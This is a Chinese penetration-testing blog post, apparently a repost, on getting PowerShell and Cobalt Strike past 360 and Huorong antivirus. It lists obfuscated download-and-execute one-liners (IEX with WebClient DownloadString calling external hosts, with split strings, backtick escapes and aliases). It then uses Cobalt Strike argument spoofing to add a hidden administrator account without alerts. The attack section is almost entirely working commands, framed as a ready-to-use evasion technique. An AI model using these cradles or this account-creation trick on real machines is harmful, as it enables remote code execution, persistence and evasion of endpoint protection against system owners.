powershell上对抗360与火绒的技巧

admin

139536
文章

114
评论

2021年9月14日19:39:47评论355 views字数 2731阅读9分6秒阅读模式

0x01 前言

免杀上线一直是经久不衰的话题，今天介绍利用powershell上线来绕过360与火绒的防护，并介绍绕过添加用户的拦截的方式，我们的实验环境是一台装了360全家桶与火绒的win7。

0x02 powershell免杀绕过360与火绒上线

powershell免杀绕过思路参考：

安全客原始payload

Invoke-Expression (New-Object Net.WebClient).DownloadString('http:9821.ink/xxx')

将http分开+号连接

Invoke-Expression(New-Object Net.WebClient).DownloadString("ht"+"tp://9821.ink/xxx")

变量代替

IEX$wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink/xxx')

转义符号加在其他字符前不影响字符的意思，避免在0,a,b,f,n,r,t,v的小写字母前出现即可。

Invoke-Expression (New-Object Net.WebClient)."Down`loadString"('h'+'ttp://9821.ink/xxx')

同样可以使用在Net.Webclient上

Invoke-Expression(New-Object "`Ne`T.`Web`Cli`ent")."Down`l`oadString"('h'+'ttp://9821.ink/xxx')

freebuf

powershell -NoExit"$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://9821.ink/xxx'')'.Replace('123','adString');IEX ($c1+$c2)

powershell "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3="$a1,$a2";IEX(-join $a3)"

chabug #别名

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://9821.ink/xxx')

综合起来就成了最开始的上线命令：

powershell set-alias -name kaspersky -value Invoke-Expression;"$a1='kaspersky ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3=$a1,$a2;kaspersky(-join $a3)"

那么看了一些powershell的绕过上线cs思路，我们来执行修改命令达到上线，首先还是最原始的生成常见的方式来上线cs：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"

我们可以看到，此时火绒发现了系统调用了powershell，立刻进行了拦截，那么我们就要修改powershell上线的命令，进行绕过达到上线。

原命令：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"

我们可以利用powershell的特性，利用别名、分割、替换变量等多个方式来绕过检测。

修改后的命令：

powershell  -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://192.168.12.20:80/a')"

可以看到修改后的命令，对执行的命令进行替换，并将http分开+号连接的思路，便可以达到免杀上线效果。

此时去目标机器执行：

360与火绒均无报警，CS已经上线，成功绕过杀软达到上线目的。

0x03 绕过杀软添加用户

在内网渗透过程中，有些时候需要往目标机器添加用户，来进行所需操作，但是添加用户杀软非常敏感，都会进行拦截。

为了突出文章目的，我们直接使用cs自带的提权EXP来达到system权限。

我们直接在cs进行用户添加。可以看到遭到了360的拦截：

beacon> shell net user tubai e2e2@wqw /add

此时的思路可以使用cs中argue参数绕过杀软添加用户，#参数污染：

net1 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

#查看污染的参数 argue

#用污染的net1执行敏感操作

execute net1 user tubai ddsd@123 /add

此时shell net user发现，tubai用户已经添加进去，且360与火绒均未拦截。

我们再将tubai用户加入到administrator组

beacon> execute net1 localgroup administrators tubai /add

此时我们shell net user tubai ，发现已经成功加入administrators组中

至此便绕过了360与火绒对添加用户的拦截。

0x04 总结

powershell的绕过方式除了命令混淆还有很多，免杀的目的就是围绕你的目标机器进行实施的，并非要追求免杀率，过VT，只要过了你的目标机就好。还有，如无特殊需要，渗透过程中还是不添加用户为妙，毕竟日志都有记录，动静也不小。

参考：

http://www.0x3.biz/archives/837.html

https://xz.aliyun.com/t/7903#toc-0

关注公众号回复“9527”可免费获取一套HTB靶场文档和视频，“1120”安全参考等安全杂志PDF电子版，“1208”个人常用高效爆破字典，“0221”2020年酒仙桥文章打包，还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

欢迎私下骚扰

本文始发于微信公众号（潇湘信安）：powershell上对抗360与火绒的技巧

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

powershell上对抗360与火绒的技巧

Vulnhub-zico2靶机教学

使用 PowerShell 中的动态 API 解析绕过 AMSI

Sunder：旨在利用 BYOVD 漏洞的 Windows rootkit

浅谈常见edu漏洞，逻辑漏洞，越权，接管到getshell，小白如何快速找准漏洞

【云安全】k8s漏洞合集 | k8s安全攻防

Doppelganger项目 - 模仿灵魂，不留痕迹

SpEL表达式漏洞注入内存马

挖洞小记 | 记一次拿下某软柿子证书站过程！

渗透测试 FastJSON 是个延时炸弹？

HTB - BigBang

发表评论

在线咨询

微信